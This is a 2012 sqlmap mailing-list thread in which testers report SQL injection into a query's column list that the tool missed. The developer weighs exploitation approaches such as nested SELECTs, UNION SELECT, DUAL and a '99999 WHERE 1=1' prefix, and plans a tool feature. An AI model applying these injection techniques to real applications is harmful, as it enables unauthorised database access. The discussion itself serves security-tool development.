Thread: [sqlmap-users] Injection into columns list
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users
|
From: Troy B <pow...@gm...> - 2012-07-24 21:17:38
|
Evening all, I had an SQL injection into a MySQL5-based web application the other week which involved me having control over the column list being selected. I tried sqlmap against the URL, but it didn't find the injection point. I tried again, taking the --level and --risk a little higher, but still nothing. In the end, I manually exploited it using a sub-select. Was I doing something wrong with sqlmap, or will it not identify injection points like that? I can provide an example of the query the application was using if this helps. Regards, Matt |
|
From: Miroslav S. <mir...@gm...> - 2012-07-24 22:48:45
|
Hi Troy. More info is required for sure. You mean that you just need a (SELECT...)/subquery type of injection? This is something that we are aware that we need to do. Kind regards, Miroslav Stampar On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...> wrote: > Evening all, > > I had an SQL injection into a MySQL5-based web application the other week > which involved me having control over the column list being selected. I > tried sqlmap against the URL, but it didn't find the injection point. I > tried again, taking the --level and --risk a little higher, but still > nothing. > > In the end, I manually exploited it using a sub-select. Was I doing > something wrong with sqlmap, or will it not identify injection points like > that? I can provide an example of the query the application was using if > this helps. > > Regards, > > Matt > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Dennis <kor...@ya...> - 2012-07-25 09:28:37
|
I'm not sure about Troy, but I had a similar case recently. I could control the bit of the query between SELECT and FROM, which could be exploited either with nested (SELECT)s or by expanding the query with another FROM [...] UNION SELECT [...] to extend the query. SQLmap did not find the injection. The DBMS was Oracle. Cheers Am 25.07.2012 00:48, schrieb Miroslav Stampar: > > Hi Troy. > > More info is required for sure. > > You mean that you just need a (SELECT...)/subquery type of injection? > This is something that we are aware that we need to do. > > Kind regards, > Miroslav Stampar > > On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm... > <mailto:pow...@gm...>> wrote: > > Evening all, > > I had an SQL injection into a MySQL5-based web application the > other week which involved me having control over the column list > being selected. I tried sqlmap against the URL, but it didn't > find the injection point. I tried again, taking the --level and > --risk a little higher, but still nothing. > > In the end, I manually exploited it using a sub-select. Was I > doing something wrong with sqlmap, or will it not identify > injection points like that? I can provide an example of the query > the application was using if this helps. > > Regards, > > Matt > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. > Discussions > will include endpoint security, mobile security and the latest in > malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Miroslav S. <mir...@gm...> - 2012-07-25 09:47:55
|
Hi. How would you exploit this: SELECT $_GET['id'] FROM table on all DBMSes? Oracle and MySQL have DUAL but what with others? At the end we'll end with 10 new payloads and/or boundaries each of those covering each DBMS. Kind regards, Miroslav Stampar On Wed, Jul 25, 2012 at 11:28 AM, Dennis <kor...@ya...> wrote: > I'm not sure about Troy, but I had a similar case recently. I could > control the bit of the query between SELECT and FROM, which could be > exploited either with nested (SELECT)s or by expanding the query with > another FROM [...] UNION SELECT [...] to extend the query. SQLmap did not > find the injection. The DBMS was Oracle. > > Cheers > > > Am 25.07.2012 00:48, schrieb Miroslav Stampar: > > Hi Troy. > > More info is required for sure. > > You mean that you just need a (SELECT...)/subquery type of injection? This > is something that we are aware that we need to do. > > Kind regards, > Miroslav Stampar > On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...> > wrote: > >> Evening all, >> >> I had an SQL injection into a MySQL5-based web application the other >> week which involved me having control over the column list being selected. >> I tried sqlmap against the URL, but it didn't find the injection point. I >> tried again, taking the --level and --risk a little higher, but still >> nothing. >> >> In the end, I manually exploited it using a sub-select. Was I doing >> something wrong with sqlmap, or will it not identify injection points like >> that? I can provide an example of the query the application was using if >> this helps. >> >> Regards, >> >> Matt >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > > > _______________________________________________ > sqlmap-users mailing lis...@li...https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-07-25 10:10:04
|
Hi again. Most generic approach would be to use dummy prefix as "99999 WHERE 1=1", but there are lots of potential pitfalls here (e.g. if column name is delimited with a DBMS specific column name delimiter). We've added a new issue for this [1]. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/120 On Wed, Jul 25, 2012 at 11:47 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi. > > How would you exploit this: > > SELECT $_GET['id'] FROM table > > on all DBMSes? > > Oracle and MySQL have DUAL but what with others? At the end we'll end with > 10 new payloads and/or boundaries each of those covering each DBMS. > > Kind regards, > Miroslav Stampar > > > On Wed, Jul 25, 2012 at 11:28 AM, Dennis <kor...@ya...> wrote: > >> I'm not sure about Troy, but I had a similar case recently. I could >> control the bit of the query between SELECT and FROM, which could be >> exploited either with nested (SELECT)s or by expanding the query with >> another FROM [...] UNION SELECT [...] to extend the query. SQLmap did not >> find the injection. The DBMS was Oracle. >> >> Cheers >> >> >> Am 25.07.2012 00:48, schrieb Miroslav Stampar: >> >> Hi Troy. >> >> More info is required for sure. >> >> You mean that you just need a (SELECT...)/subquery type of injection? >> This is something that we are aware that we need to do. >> >> Kind regards, >> Miroslav Stampar >> On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...> >> wrote: >> >>> Evening all, >>> >>> I had an SQL injection into a MySQL5-based web application the other >>> week which involved me having control over the column list being selected. >>> I tried sqlmap against the URL, but it didn't find the injection point. I >>> tried again, taking the --level and --risk a little higher, but still >>> nothing. >>> >>> In the end, I manually exploited it using a sub-select. Was I doing >>> something wrong with sqlmap, or will it not identify injection points like >>> that? I can provide an example of the query the application was using if >>> this helps. >>> >>> Regards, >>> >>> Matt >>> >>> >>> ------------------------------------------------------------------------------ >>> Live Security Virtual Conference >>> Exclusive live event will cover all the ways today's security and >>> threat landscape has changed and how IT managers can respond. Discussions >>> will include endpoint security, mobile security and the latest in malware >>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> >> >> >> _______________________________________________ >> sqlmap-users mailing lis...@li...https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
|
From: Dennis <kor...@ya...> - 2012-07-25 12:17:29
|
Hey, haven't spent any thinking on a generic approach yet as I was on an Oracle DBMS and did fine. But I see your point... I will give it a thought... Cheers, Dennis Am 25.07.2012 12:09, schrieb Miroslav Stampar: > Hi again. > > Most generic approach would be to use dummy prefix as "99999 WHERE > 1=1", but there are lots of potential pitfalls here (e.g. if column > name is delimited with a DBMS specific column name delimiter). We've > added a new issue for this [1]. > > Kind regards, > Miroslav Stampar > > [1] https://github.com/sqlmapproject/sqlmap/issues/120 > > On Wed, Jul 25, 2012 at 11:47 AM, Miroslav Stampar > <mir...@gm... <mailto:mir...@gm...>> wrote: > > Hi. > > How would you exploit this: > > SELECT $_GET['id'] FROM table > > on all DBMSes? > > Oracle and MySQL have DUAL but what with others? At the end we'll > end with 10 new payloads and/or boundaries each of those covering > each DBMS. > > Kind regards, > Miroslav Stampar > > > On Wed, Jul 25, 2012 at 11:28 AM, Dennis <kor...@ya... > <mailto:kor...@ya...>> wrote: > > I'm not sure about Troy, but I had a similar case recently. I > could control the bit of the query between SELECT and FROM, > which could be exploited either with nested (SELECT)s or by > expanding the query with another FROM [...] UNION SELECT [...] > to extend the query. SQLmap did not find the injection. The > DBMS was Oracle. > > Cheers > > > Am 25.07.2012 00 <tel:25.07.2012%2000>:48, schrieb Miroslav > Stampar: >> >> Hi Troy. >> >> More info is required for sure. >> >> You mean that you just need a (SELECT...)/subquery type of >> injection? This is something that we are aware that we need >> to do. >> >> Kind regards, >> Miroslav Stampar >> >> On Jul 24, 2012 11:18 PM, "Troy B" >> <pow...@gm... >> <mailto:pow...@gm...>> wrote: >> >> Evening all, >> >> I had an SQL injection into a MySQL5-based web >> application the other week which involved me having >> control over the column list being selected. I tried >> sqlmap against the URL, but it didn't find the injection >> point. I tried again, taking the --level and --risk a >> little higher, but still nothing. >> >> In the end, I manually exploited it using a sub-select. >> Was I doing something wrong with sqlmap, or will it not >> identify injection points like that? I can provide an >> example of the query the application was using if this helps. >> >> Regards, >> >> Matt >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's >> security and >> threat landscape has changed and how IT managers can >> respond. Discussions >> will include endpoint security, mobile security and the >> latest in malware >> threats. >> http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> <mailto:sql...@li...> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> >> >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... <mailto:sql...@li...> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > -- > Miroslav Stampar > http://about.me/stamparm |
×
Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.
Thanks for helping keep SourceForge clean.
X